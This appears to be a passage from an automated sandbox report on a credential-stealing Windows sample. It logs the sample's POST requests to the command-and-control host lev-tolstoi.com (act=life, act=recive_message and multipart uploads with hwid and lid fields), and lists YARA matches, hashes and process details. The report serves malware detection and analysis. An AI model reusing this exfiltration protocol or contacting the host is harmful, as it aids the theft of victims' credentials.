2024-12-26 11:45:11 UTC	10097	IN	Data Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09 Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
2024-12-26 11:45:11 UTC	10545	IN	Data Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 Data Ascii: NIVERSE":"public","LANGUAGE":"english","COUNTRY":"US","MEDIA_CDN_COMMUNITY_URL":"https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/","MEDIA_CDN_URL":"htt

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	172.67.157.254	443	3500	C:\Users\user\Desktop\6GNqkkKY0j.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:45:13 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: lev-tolstoi.com
2024-12-26 11:45:13 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-26 11:45:16 UTC	1130	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 11:45:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tc42rn24gg7ifkudftuap193v0; expires=Mon, 21 Apr 2025 05:31:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lNi6jkEXbasj8DJZW%2B%2FovXU1g2jXcTn65OQL6b9CzAUp56mkwcovmnNBI7Zhxuw%2BILkTErdDPZAL%2Be6TmAZ5WrQSq4Y%2B98BpO%2FU6RYxTYtOV8LZzPrKWx179t41EKp4XXEU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f80d2cb6efc0f55-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1583&min_rtt=1576&rtt_var=605&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=906&delivery_rate=1785932&cwnd=156&unsent_bytes=0&cid=64a98c0f541e1f51&ts=2827&x=0"
2024-12-26 11:45:16 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-26 11:45:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49706	172.67.157.254	443	3500	C:\Users\user\Desktop\6GNqkkKY0j.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:45:17 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 53 Host: lev-tolstoi.com
2024-12-26 11:45:17 UTC	53	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-26 11:45:37 UTC	1131	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 11:45:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hd8o268toco5ubqi2m52hgl795; expires=Mon, 21 Apr 2025 05:32:16 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nz1CTgeFjs7G%2Bl2nGSx9qLXVw85dyi7lfjCmAhY1rghdoGnVHWv0TsJm7vy%2F00LS1HmWFpfJIord%2BN3s%2Flp%2FSmJDhKag6P7%2Bx0AnBVkO3xkIeAcKjuzrZNkCM2ryW5Bgfzs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f80d2e55fd94228-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1874&min_rtt=1863&rtt_var=722&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=952&delivery_rate=1492842&cwnd=209&unsent_bytes=0&cid=06fc03077b6a9587&ts=20060&x=0"
2024-12-26 11:45:37 UTC	238	IN	Data Raw: 32 64 31 65 0d 0a 38 65 32 46 71 47 56 43 63 55 42 49 44 63 32 50 66 43 6a 68 5a 48 59 69 66 79 76 32 6f 62 38 74 4c 6f 58 65 33 59 30 68 41 58 61 4b 7a 2f 4f 4b 58 33 5a 64 59 6a 74 6f 37 37 55 49 57 70 51 42 57 67 41 65 54 39 53 62 32 55 78 43 39 72 76 78 72 31 64 73 56 4d 75 4c 35 4d 51 57 4a 31 31 69 4c 58 58 76 74 53 64 54 77 77 45 59 41 45 55 4a 6b 38 76 64 54 45 4c 6e 76 37 62 69 55 57 30 56 6d 59 48 69 77 41 41 68 46 53 45 6b 59 4b 6a 71 47 55 6d 4c 43 68 39 50 46 30 62 55 6a 5a 31 49 56 4b 66 6b 2f 38 42 45 64 52 65 38 6a 50 62 44 52 7a 39 64 4f 32 70 6f 6f 36 31 47 43 6f 41 42 46 45 34 5a 54 35 33 4a 31 30 56 4b 35 72 71 33 2f 55 68 6e 48 70 6d 50 34 63 45 4b 4b 41 45 73 4c 6d 65 6a 37 42 4e 4a Data Ascii: 2d1e8e2FqGVCcUBIDc2PfCjhZHYifyv2ob8tLoXe3Y0hAXaKz/OKX3ZdYjto77UIWpQBWgAeT9Sb2UxC9rvxr1dsVMuL5MQWJ11iLXXvtSdTwwEYAEUJk8vdTELnv7biUW0VmYHiwAAhFSEkYKjqGUmLCh9PF0bUjZ1IVKfk/8BEdRe8jPbDRz9dO2poo61GCoABFE4ZT53J10VK5rq3/UhnHpmP4cEKKAEsLmej7BNJ
2024-12-26 11:45:37 UTC	1369	IN	Data Raw: 77 30 68 55 52 77 55 4a 7a 49 4f 4f 66 55 2f 32 72 61 72 69 55 32 56 55 6a 4d 48 2b 69 67 41 73 55 33 70 71 5a 36 50 6a 47 30 6d 4d 41 52 56 41 44 30 61 55 77 4e 56 48 53 4f 32 7a 73 4f 42 4e 61 52 4f 62 68 75 44 46 41 43 67 56 4c 53 6b 76 34 61 30 5a 55 73 4e 65 56 47 41 4e 53 70 66 58 30 46 34 4d 2b 50 4b 6d 72 30 52 76 56 4d 76 50 34 63 51 47 4c 52 4d 77 49 6d 53 6b 36 41 78 42 69 67 73 5a 51 42 42 44 6d 38 44 64 53 45 62 74 73 37 58 72 54 6d 34 53 6b 34 2b 6e 68 45 63 6e 43 32 4a 79 4c 34 7a 6f 44 6b 32 50 45 46 5a 36 58 56 62 61 32 70 31 49 51 4b 66 6b 2f 2b 64 47 59 42 65 59 67 4f 54 43 44 44 49 54 4d 43 78 69 71 76 38 59 54 34 30 4d 46 31 49 58 52 35 4c 41 31 45 52 46 34 72 75 37 72 77 30 6a 45 34 76 50 76 34 6f 6d 4c 52 67 75 49 48 69 76 72 51 45 Data Ascii: w0hURwUJzIOOfU/2rariU2VUjMH+igAsU3pqZ6PjG0mMARVAD0aUwNVHSO2zsOBNaRObhuDFACgVLSkv4a0ZUsNeVGANSpfX0F4M+PKmr0RvVMvP4cQGLRMwImSk6AxBigsZQBBDm8DdSEbts7XrTm4Sk4+nhEcnC2JyL4zoDk2PEFZ6XVba2p1IQKfk/+dGYBeYgOTCDDITMCxiqv8YT40MF1IXR5LA1ERF4ru7rw0jE4vPv4omLRguIHivrQE
2024-12-26 11:45:37 UTC	1369	IN	Data Raw: 46 49 52 51 35 4c 4d 30 45 4d 4d 71 66 79 34 39 77 4d 37 56 4c 6d 4d 38 38 6b 4e 59 69 59 68 4a 47 47 6f 2b 31 35 56 7a 52 39 55 52 78 45 4a 7a 49 50 51 54 6b 54 68 72 72 44 69 51 47 30 61 6e 49 72 6f 77 67 63 67 48 69 63 75 5a 4b 54 75 45 30 36 52 44 42 52 49 47 45 69 65 79 5a 30 42 44 4f 43 6b 2f 37 63 44 55 67 4f 59 7a 64 4c 4a 43 53 34 55 4e 47 70 77 34 66 52 65 54 59 39 47 54 41 41 51 51 5a 48 47 30 6b 35 47 36 62 6d 31 34 30 74 74 46 34 47 41 34 38 6f 4c 4b 42 6b 76 4a 47 75 6e 35 42 56 42 68 51 59 56 53 6c 30 48 31 4d 54 46 44 78 53 6e 69 4c 6a 6a 54 6d 78 57 70 6f 7a 70 78 41 41 32 55 7a 31 6b 64 75 2f 71 45 67 72 62 52 68 68 4a 48 55 4b 65 78 39 31 49 51 65 4b 2f 75 4f 78 4f 5a 42 36 64 69 4f 50 47 44 69 30 56 49 69 31 72 71 76 38 62 51 34 38 4b Data Ascii: FIRQ5LM0EMMqfy49wM7VLmM88kNYiYhJGGo+15VzR9URxEJzIPQTkThrrDiQG0anIrowgcgHicuZKTuE06RDBRIGEieyZ0BDOCk/7cDUgOYzdLJCS4UNGpw4fReTY9GTAAQQZHG0k5G6bm140ttF4GA48oLKBkvJGun5BVBhQYVSl0H1MTFDxSniLjjTmxWpozpxAA2Uz1kdu/qEgrbRhhJHUKex91IQeK/uOxOZB6diOPGDi0VIi1rqv8bQ48K
2024-12-26 11:45:37 UTC	1369	IN	Data Raw: 2f 55 33 4a 4e 57 44 4f 43 77 2f 37 63 44 61 68 32 42 67 65 6e 44 43 69 59 62 4a 53 52 69 70 4f 73 56 54 59 51 41 47 55 67 51 54 4a 66 43 32 55 56 65 35 4c 65 31 34 6b 6b 6a 57 74 4f 49 2f 34 70 66 59 44 51 75 41 33 2b 30 2f 77 67 4b 6e 45 67 4e 41 42 70 46 31 4a 75 64 54 45 50 75 73 37 66 6e 54 47 77 51 6e 59 6e 68 78 77 49 76 47 54 41 69 59 61 4c 6d 45 55 47 52 42 68 6c 45 45 55 32 63 79 4e 63 50 41 71 65 37 70 36 38 62 49 79 47 65 67 4f 66 4a 45 57 41 4d 62 44 4d 76 71 4f 46 65 45 73 4d 4b 47 6b 41 53 52 5a 6a 49 31 55 35 41 36 62 75 36 35 6b 74 72 42 70 4b 4c 37 38 73 4a 4c 78 49 6d 4c 32 71 72 36 68 70 4d 6a 45 5a 61 41 42 70 52 31 4a 75 64 59 47 76 53 2f 70 37 56 41 33 78 61 69 73 2f 67 78 6b 64 34 55 79 34 70 59 36 66 69 47 45 4f 50 44 42 31 4c 45 Data Ascii: /U3JNWDOCw/7cDah2BgenDCiYbJSRipOsVTYQAGUgQTJfC2UVe5Le14kkjWtOI/4pfYDQuA3+0/wgKnEgNABpF1JudTEPus7fnTGwQnYnhxwIvGTAiYaLmEUGRBhlEEU2cyNcPAqe7p68bIyGegOfJEWAMbDMvqOFeEsMKGkASRZjI1U5A6bu65ktrBpKL78sJLxImL2qr6hpMjEZaABpR1JudYGvS/p7VA3xais/gxkd4Uy4pY6fiGEOPDB1LE
2024-12-26 11:45:37 UTC	1369	IN	Data Raw: 65 53 30 6e 6f 76 62 37 70 55 57 51 64 67 59 48 71 78 51 38 6f 47 69 4d 75 61 71 4c 72 45 6b 43 43 41 52 70 4f 46 51 6e 61 67 39 70 58 44 4c 2f 38 6e 76 39 59 63 51 4b 65 72 75 72 46 52 7a 39 64 4f 32 70 6f 6f 36 31 47 43 6f 6f 55 45 45 30 50 51 4a 50 4e 30 6b 78 65 35 72 47 30 2f 55 52 73 45 4a 53 44 34 63 55 42 49 52 59 6f 4a 6d 69 71 35 68 46 47 77 30 68 55 52 77 55 4a 7a 49 50 7a 52 46 2f 77 76 37 48 6b 56 58 68 55 6a 4d 48 2b 69 67 41 73 55 33 70 71 62 4b 54 6d 47 6b 71 50 42 68 42 4e 48 56 75 62 78 4e 70 47 52 2f 57 32 75 4f 68 49 61 78 2b 63 69 66 58 47 43 54 49 57 4d 44 67 76 34 61 30 5a 55 73 4e 65 56 48 59 61 57 59 54 41 6e 33 35 61 35 4b 71 30 34 6b 38 6a 43 39 32 57 70 38 30 4c 59 45 74 69 4c 47 43 6d 37 68 46 4c 69 67 6f 5a 52 52 52 4d 6c 63 Data Ascii: eS0novb7pUWQdgYHqxQ8oGiMuaqLrEkCCARpOFQnag9pXDL/8nv9YcQKerurFRz9dO2poo61GCooUEE0PQJPN0kxe5rG0/URsEJSD4cUBIRYoJmiq5hFGw0hURwUJzIPzRF/wv7HkVXhUjMH+igAsU3pqbKTmGkqPBhBNHVubxNpGR/W2uOhIax+cifXGCTIWMDgv4a0ZUsNeVHYaWYTAn35a5Kq04k8jC92Wp80LYEtiLGCm7hFLigoZRRRMlc
2024-12-26 11:45:37 UTC	1369	IN	Data Raw: 31 62 2b 6b 72 31 77 74 44 64 4f 49 36 34 70 66 59 42 41 6c 4b 57 36 6c 35 42 4a 46 68 41 49 47 53 68 70 62 6c 63 4c 57 51 6b 44 6e 73 62 4c 6c 51 6d 6f 5a 6e 34 4c 67 7a 51 67 6c 55 32 78 71 61 4c 65 74 52 67 71 69 43 78 39 4d 52 68 50 55 33 4a 4e 57 44 4f 43 77 2f 37 63 44 59 78 36 57 68 65 72 4a 43 43 4d 42 49 79 78 39 72 2b 41 55 57 49 6b 4e 45 55 30 51 52 4a 66 46 32 30 52 41 39 62 57 2f 37 45 67 6a 57 74 4f 49 2f 34 70 66 59 44 41 31 50 47 57 6f 34 51 68 42 67 67 55 43 54 51 30 4a 32 6f 50 4d 53 46 32 6e 35 4b 6e 2f 56 47 51 4c 33 5a 61 6e 7a 51 74 67 53 32 49 73 5a 71 6e 71 47 45 53 52 41 78 4a 50 45 6b 43 64 78 39 56 4d 54 4f 4f 34 75 4f 70 41 62 78 2b 55 6a 4f 6a 4f 44 69 34 61 4c 57 6f 68 37 2b 6f 47 43 74 74 47 4e 56 73 65 52 5a 6d 44 77 67 46 Data Ascii: 1b+kr1wtDdOI64pfYBAlKW6l5BJFhAIGShpblcLWQkDnsbLlQmoZn4LgzQglU2xqaLetRgqiCx9MRhPU3JNWDOCw/7cDYx6WherJCCMBIyx9r+AUWIkNEU0QRJfF20RA9bW/7EgjWtOI/4pfYDA1PGWo4QhBggUCTQ0J2oPMSF2n5Kn/VGQL3ZanzQtgS2IsZqnqGESRAxJPEkCdx9VMTOO4uOpAbx+UjOjODi4aLWoh7+oGCttGNVseRZmDwgF
2024-12-26 11:45:37 UTC	1369	IN	Data Raw: 61 39 45 65 31 54 4c 7a 38 66 42 45 53 55 55 4e 47 68 61 72 4f 4d 51 54 5a 56 47 43 33 39 54 43 5a 76 5a 6e 52 64 31 2f 76 79 34 34 77 4d 37 56 49 61 49 35 38 30 64 4e 68 51 75 4f 32 53 69 34 54 78 46 68 42 41 58 54 78 35 59 6e 59 2f 57 51 67 79 70 2f 4c 6a 33 41 7a 74 55 76 49 6a 78 79 53 67 6a 41 69 74 71 49 65 2f 71 43 41 72 62 52 69 6f 41 44 30 71 45 77 4e 4a 65 63 71 66 6b 70 74 45 44 61 41 4b 55 6e 2b 54 63 44 43 30 66 4d 78 51 76 39 37 6c 4d 47 4e 46 55 52 6c 39 64 56 71 75 4e 6e 55 34 4d 76 34 57 6d 72 31 55 6a 54 4d 48 42 70 39 68 48 65 46 4e 6c 4b 58 32 39 36 78 31 63 67 45 45 71 66 6a 70 66 6e 73 54 4e 53 46 76 6f 2f 50 47 76 54 43 4e 4d 71 73 2f 75 7a 52 77 78 42 53 38 36 61 4f 2f 53 55 41 71 62 52 6b 77 41 4b 45 71 61 7a 64 70 5a 58 61 71 62 Data Ascii: a9Ee1TLz8fBESUUNGharOMQTZVGC39TCZvZnRd1/vy44wM7VIaI580dNhQuO2Si4TxFhBAXTx5YnY/WQgyp/Lj3AztUvIjxySgjAitqIe/qCArbRioAD0qEwNJecqfkptEDaAKUn+TcDC0fMxQv97lMGNFURl9dVquNnU4Mv4Wmr1UjTMHBp9hHeFNlKX296x1cgEEqfjpfnsTNSFvo/PGvTCNMqs/uzRwxBS86aO/SUAqbRkwAKEqazdpZXaqb
2024-12-26 11:45:37 UTC	1369	IN	Data Raw: 51 71 72 59 37 71 78 55 73 75 47 43 49 74 66 37 6e 32 55 6b 4b 41 48 41 35 2b 49 32 4b 59 78 64 70 56 53 2b 47 61 6e 36 38 4e 49 78 76 54 31 39 36 4b 54 32 41 73 62 47 70 33 37 37 56 65 66 34 41 49 47 6b 63 4c 57 4e 6e 72 2f 6e 56 32 70 5a 43 34 2b 67 46 58 45 34 4f 65 37 4d 63 4c 59 46 31 69 4c 43 2f 33 76 56 41 4b 68 78 64 55 47 45 30 62 7a 35 61 4f 47 42 79 31 6f 2f 48 32 41 33 56 55 79 39 32 70 69 68 56 67 53 32 4a 74 62 4c 33 2f 47 45 6d 56 42 56 4e 2b 49 32 36 61 78 4e 78 5a 58 50 43 7a 67 64 46 57 59 42 71 64 69 50 48 62 52 32 35 54 4c 57 6f 33 6c 71 31 57 43 72 78 49 56 46 68 64 45 64 54 32 33 6b 46 43 34 4b 71 75 6f 6d 52 74 45 35 4b 5a 39 39 30 49 59 46 31 69 4c 43 2f 33 76 31 41 4b 68 78 64 55 47 45 30 62 7a 35 61 4f 47 42 79 31 6f 2f 48 32 41 Data Ascii: QqrY7qxUsuGCItf7n2UkKAHA5+I2KYxdpVS+Gan68NIxvT196KT2AsbGp377Vef4AIGkcLWNnr/nV2pZC4+gFXE4Oe7McLYF1iLC/3vVAKhxdUGE0bz5aOGBy1o/H2A3VUy92pihVgS2JtbL3/GEmVBVN+I26axNxZXPCzgdFWYBqdiPHbR25TLWo3lq1WCrxIVFhdEdT23kFC4KquomRtE5KZ990IYF1iLC/3v1AKhxdUGE0bz5aOGBy1o/H2A
2024-12-26 11:45:37 UTC	1369	IN	Data Raw: 46 39 38 63 49 4a 31 45 43 4c 58 6d 73 72 56 41 4b 6a 30 5a 4d 41 42 78 44 68 4d 37 53 53 41 44 67 70 72 69 76 44 53 4d 61 30 39 65 6e 79 77 30 77 48 69 30 74 49 36 6e 6a 45 41 71 63 53 41 30 41 43 77 6e 4d 6b 4a 4d 50 58 71 66 6b 2f 36 68 41 63 51 61 56 6a 50 48 4a 51 42 34 74 44 7a 68 6f 76 2b 35 63 65 34 34 43 41 6c 55 65 57 5a 50 39 34 32 4a 65 34 4b 79 38 72 58 4a 31 46 35 4f 42 34 49 70 4a 59 41 74 69 63 69 2b 43 2f 78 6c 61 67 45 5a 61 41 42 45 4a 7a 49 50 51 58 55 76 33 76 2f 50 6f 57 57 52 55 6a 4d 48 2b 69 68 46 67 53 33 46 6b 4c 37 32 74 52 67 72 45 43 42 6c 42 48 6b 65 58 30 63 39 4a 54 2f 47 2f 2b 4e 46 39 54 67 61 55 6e 2b 53 49 4e 69 30 58 4e 44 39 73 76 2b 6f 67 64 4b 34 55 45 31 41 65 43 37 6a 45 30 45 4e 79 32 59 75 75 36 46 4d 68 4d 70 Data Ascii: F98cIJ1ECLXmsrVAKj0ZMABxDhM7SSADgprivDSMa09enyw0wHi0tI6njEAqcSA0ACwnMkJMPXqfk/6hAcQaVjPHJQB4tDzhov+5ce44CAlUeWZP942Je4Ky8rXJ1F5OB4IpJYAtici+C/xlagEZaABEJzIPQXUv3v/PoWWRUjMH+ihFgS3FkL72tRgrECBlBHkeX0c9JT/G/+NF9TgaUn+SINi0XND9sv+ogdK4UE1AeC7jE0ENy2Yuu6FMhMp

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49743	172.67.157.254	443	3500	C:\Users\user\Desktop\6GNqkkKY0j.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:45:39 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=YXHVYIT847QELZEBS User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12835 Host: lev-tolstoi.com
2024-12-26 11:45:39 UTC	12835	OUT	Data Raw: 2d 2d 59 58 48 56 59 49 54 38 34 37 51 45 4c 5a 45 42 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 42 31 46 37 46 30 32 34 45 38 35 33 37 44 32 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 59 58 48 56 59 49 54 38 34 37 51 45 4c 5a 45 42 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 59 58 48 56 59 49 54 38 34 37 51 45 4c 5a 45 42 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 Data Ascii: --YXHVYIT847QELZEBSContent-Disposition: form-data; name="hwid"2B1F7F024E8537D2BEBA0C6A975F1733--YXHVYIT847QELZEBSContent-Disposition: form-data; name="pid"2--YXHVYIT847QELZEBSContent-Disposition: form-data; name="lid"LOGS11--LiveTraf

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49809	172.67.157.254	443	3500	C:\Users\user\Desktop\6GNqkkKY0j.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:46:09 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=T5B0SDDXPB8XPSJITU User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15083 Host: lev-tolstoi.com
2024-12-26 11:46:09 UTC	15083	OUT	Data Raw: 2d 2d 54 35 42 30 53 44 44 58 50 42 38 58 50 53 4a 49 54 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 42 31 46 37 46 30 32 34 45 38 35 33 37 44 32 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 54 35 42 30 53 44 44 58 50 42 38 58 50 53 4a 49 54 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 54 35 42 30 53 44 44 58 50 42 38 58 50 53 4a 49 54 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 Data Ascii: --T5B0SDDXPB8XPSJITUContent-Disposition: form-data; name="hwid"2B1F7F024E8537D2BEBA0C6A975F1733--T5B0SDDXPB8XPSJITUContent-Disposition: form-data; name="pid"2--T5B0SDDXPB8XPSJITUContent-Disposition: form-data; name="lid"LOGS11--LiveT

Statistics

CPU Usage

• 6GNqkkKY0j.exe

Click to jump to process

Memory Usage

• 6GNqkkKY0j.exe

Click to jump to process

High Level Behavior Distribution

• File
• Registry

Click to dive into process behavior distribution

Target ID:	0
Start time:	06:45:05
Start date:	26/12/2024
Path:	C:\Users\user\Desktop\6GNqkkKY0j.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\6GNqkkKY0j.exe"
Imagebase:	0x2f0000
File size:	2'894'848 bytes
MD5 hash:	1778A174A471FDEC99C35907F2267D30
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3002739984.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3020004985.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3023883651.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3024388435.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2695354440.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Function 013F7CE0 Relevance: 3.4, Strings: 2, Instructions: 872COMMON

Download Yara Rule

Strings

p:, xrefs: 013F82C0
2.5.29.15, xrefs: 013F7F0E

Memory Dump Source

Source File: 00000000.00000003.3023883651.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Offset: 013E7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_13e7000_6GNqkkKY0j.jbxd

Yara matches

Similarity

API ID:
String ID: 2.5.29.15$p:
API String ID: 0-346634184
Opcode ID: cc1dbdf5d0cfa3dcd2a2d61f144fb4745583ee84a07ea2b9a6ca4271231399f6
Instruction ID: 52d408b1f66f018f3ef5f5e132af709d4b3d2d71af33a14204d35d7d30a71f92
Opcode Fuzzy Hash: cc1dbdf5d0cfa3dcd2a2d61f144fb4745583ee84a07ea2b9a6ca4271231399f6
Instruction Fuzzy Hash: 48C1406144E3C29FD7278B788C65295BFB1AE53228B1E81DBC5D0CF1A3D25D4C4ACB62

Function 013F7CFE Relevance: 3.3, Strings: 2, Instructions: 828COMMON

Download Yara Rule

Strings

p:, xrefs: 013F82C0
2.5.29.15, xrefs: 013F7F0E

Memory Dump Source

Source File: 00000000.00000003.3023883651.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Offset: 013E7000, based on PE: false

Joe Sandbox IDA Plugin

